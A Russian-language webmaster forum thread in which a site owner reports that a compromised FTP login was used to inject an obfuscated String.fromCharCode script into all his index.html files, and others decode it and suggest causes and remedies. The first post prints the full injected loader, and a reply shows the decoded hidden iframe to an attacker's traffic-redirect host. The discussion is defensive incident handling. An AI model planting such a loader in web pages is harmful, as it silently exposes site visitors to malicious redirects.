+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
 Добавлено: 28/03/08 в 22:42 |
сегодня случайно увидил по статистике заход с FTP аккаунта которым давно уже не пользуюсь. Стал проверять - во всех папках в index.html дописан код:
<script> document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,101,118,105,108,112,111,105,110,116,46,110,101,116,47,116,100,115,47,105,110,100,101,120,46,112,104,112,63,111,117,116,61,49,50,48,53,57,50,53,53,57,53,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,62,60,47,105,102,114,97,109,101,62,13,10))</script>
Что это такое? Кто-то с таким сталкивался? Как лечить и бороться?
Я файлы конечно переписал и FTP аккаунт этот настроил чтобы заходил он только в пустую папку которую я только что сделал.
|
|
|
|
| |
php
С нами с 09.10.06
Сообщения: 3706
Рейтинг: 2410
|
| Добавлено: 28/03/08 в 22:50 |
шляпа какая та кадированая в js.
удали ето все нахер, инфрейм пади какой нить
|
|
|
|
| |
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
| Добавлено: 28/03/08 в 23:05 |
Дык поломали наверное... и ифрейм ставят  .
|
|
|
|
| |
С нами с 19.10.05
Сообщения: 351
Рейтинг: 755
|
| Добавлено: 28/03/08 в 23:09 |
<iframe src="http://evilpoint.net/tds/index.php?out=1205925595" width=1 height=1 ></iframe>
такой фрейм грузят!!!
Допуск к фтп по IP сделай!
|
|
|
|
| |
С нами с 12.12.06
Сообщения: 871
Рейтинг: 381
|
| Добавлено: 28/03/08 в 23:23 |
что на сайтах, если старые версии ATL, то через них скорее всего ломанули, последний 17 билд.
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 28/03/08 в 23:31 |
Вобщем код я этот конечно вычистил. FTP логин этот настроил так чтобы юзер попадал сразу в пустую папку где я положил index.html Через пару часов проверю добавили в него код или нет.
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 28/03/08 в 23:36 |
| Sveridoff писал: | | что на сайтах, если старые версии ATL, то через них скорее всего ломанули, последний 17 билд. |
На сайтах простая html статика. Похоже что именно этот конкретный FTP логин увели.
|
|
|
|
| |
Деньги из воздуха...
С нами с 26.09.04
Сообщения: 3797
Рейтинг: 2283
|
| Добавлено: 28/03/08 в 23:36 |
Закрой вход по айпи с айпи отличных от твоего, если ломали по фтп, то поможет в 90% случаев.
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 28/03/08 в 23:49 |
"ломали по FTP" - это в смысле к FTP перебором подбирали пароль? А логин они где взяли?
А какие еще могут быть тут варианты взлома?
|
|
|
|
| |
+
сам дебил
С нами с 25.07.06
Сообщения: 5379
Рейтинг: 1822
|
| Добавлено: 29/03/08 в 00:13 |
| dlk44 писал: |
А какие еще могут быть тут варианты взлома? |
возможно трой у тебя на компе. какой фтп клиент юзаешь?
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 29/03/08 в 00:59 |
| rusawm писал: | | возможно трой у тебя на компе. какой фтп клиент юзаешь? |
FTP Клиент - FAR. У меня в нем настроено 15 разных FTP логинов к разным серверам - только что проверял на остальных все OK нет никакого вредоностного кода на страницах. А тот логин что похоже взломали - я его
отдавал в пользование другому челу какой у него клиент я не знаю у него похоже и сперли. Или пароль подобрали (там простой цифровой пароль) а может базу стырили у хостера потому что я только что проверил - это FTP логин мне выдал хостер еще при покупке хостинга и было это более года назад. Я им немного попользовался, сделал себе новый FTP логин и пользовался дальше уже новым. А тут смотрю сегодня статистику - кто-то заходил на FTP по этому старому логину. Вот я и заподозрил неладное...
У меня на компе стоит Фаервол Agnitum + Dr.Web
|
|
|
|
| |
127.0.0.1
С нами с 26.04.06
Сообщения: 1092
Рейтинг: 557
|
| Добавлено: 29/03/08 в 15:44 |
если хостинг виртуальный, как вариант, через дырку заифреймили клиентов,
например вебшеллом
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 29/03/08 в 16:01 |
Хостинг виртуальный.
А где можно прочитать про уязвимости/дырки и про то как работают эти вебшеллы? Хотя бы общие принципы.
|
|
|
|
| |
С нами с 28.09.07
Сообщения: 214
Рейтинг: 83
|
| Добавлено: 29/03/08 в 17:55 |
Если голый хтмл и уверен что пароль никто не мог увести, значит поломали локально.
Вебшелл - это скрипт для выполнения команд на сервере, и прочих гадостей, редактирование, удаление файлов в общем все что душе угодно.
На securitylab.ru в разделе уязвимости поищи если у тебя какие то скрипты стоят и проверь их, а если только хтмл файлы лежат, то тут либо фтп, либо локально.
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 01/04/08 в 13:33 |
У меня нет никаких скриптов. Я проверял все сайты - никаких новых файлов/папок не появилось. Так что очень похоже что таки каким-то способом увели конкретный FTP логин и добавили этот код в index файлы. Разумеется как именнно увели этот FTP логин теперь уже и не узнаешь, но я его заблокировал и сейчас вроде все OK. Но теперь конечно переодически проверяю размеры index файлов - изменился он или нет. Вот думаю - это нормально делать или это приведет к развитию мании преследования?
|
|
|
|
| |
Old Oil Barrel
С нами с 09.09.04
Сообщения: 58531
Рейтинг: 14265
|
| Добавлено: 01/04/08 в 16:29 |
Поздравляю!
Ты схзватил троян, который увел твои пассы на ФТП, АСЬКУ и все что лежит на поверхности
Взлом ФТП произошел понаставили код, который ты привел в первом посте, в этом коде зашифрован УРЛ куда уходит твой траф, скорей всего там ТДС стоит, расковыряй Джаву, вытащи домен и катай абузы хостинговой компании и домен регистранту, после того если прикроют их лавочку скрипт будет бесполезен 
ЗЫ
Чисть комп
|
|
|
|
| |
full-plastic programmist
С нами с 05.09.03
Сообщения: 8361
Рейтинг: 4779
|
| Добавлено: 01/04/08 в 16:37 |
| Sergeyka писал: | Поздравляю!
Ты схзватил троян, который увел твои пассы на ФТП, АСЬКУ и все что лежит на поверхности
... |
если у него еще 15 фтп в ФАРе прпоисано азаифреймили только 1 - то скорее всего троян у того кому давал этот логин.
|
|
|
|
вот соскучился по мастеру...
|
0
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 03/04/08 в 03:21 |
| Kors писал: | | если у него еще 15 фтп в ФАРе прпоисано азаифреймили только 1 - то скорее всего троян у того кому давал этот логин. |
Я тоже так думаю.
А еще как вариант я слышал что хакеры ломают хостеров и уводят базы с логинами/паролями на FTP, а потом эти базы продают. Потому как этот FTP логин как раз тот что по умолчанию сделал мне хостер.
|
|
|
|
| |
+ +
www.b52hosting.com Хостинг
С нами с 10.01.08
Сообщения: 4931
Рейтинг: 147
|
| Добавлено: 03/04/08 в 03:23 |
| Sergeyka писал: | Поздравляю!
Ты схзватил троян, который увел твои пассы на ФТП, АСЬКУ и все что лежит на поверхности
Взлом ФТП произошел понаставили код, который ты привел в первом посте, в этом коде зашифрован УРЛ куда уходит твой траф, скорей всего там ТДС стоит, расковыряй Джаву, вытащи домен и катай абузы хостинговой компании и домен регистранту, после того если прикроют их лавочку скрипт будет бесполезен
ЗЫ
Чисть комп |
Нет у меня на компе никаких троянов. Из 15 FTP логинов увели только один.
|
|
|
|
| |
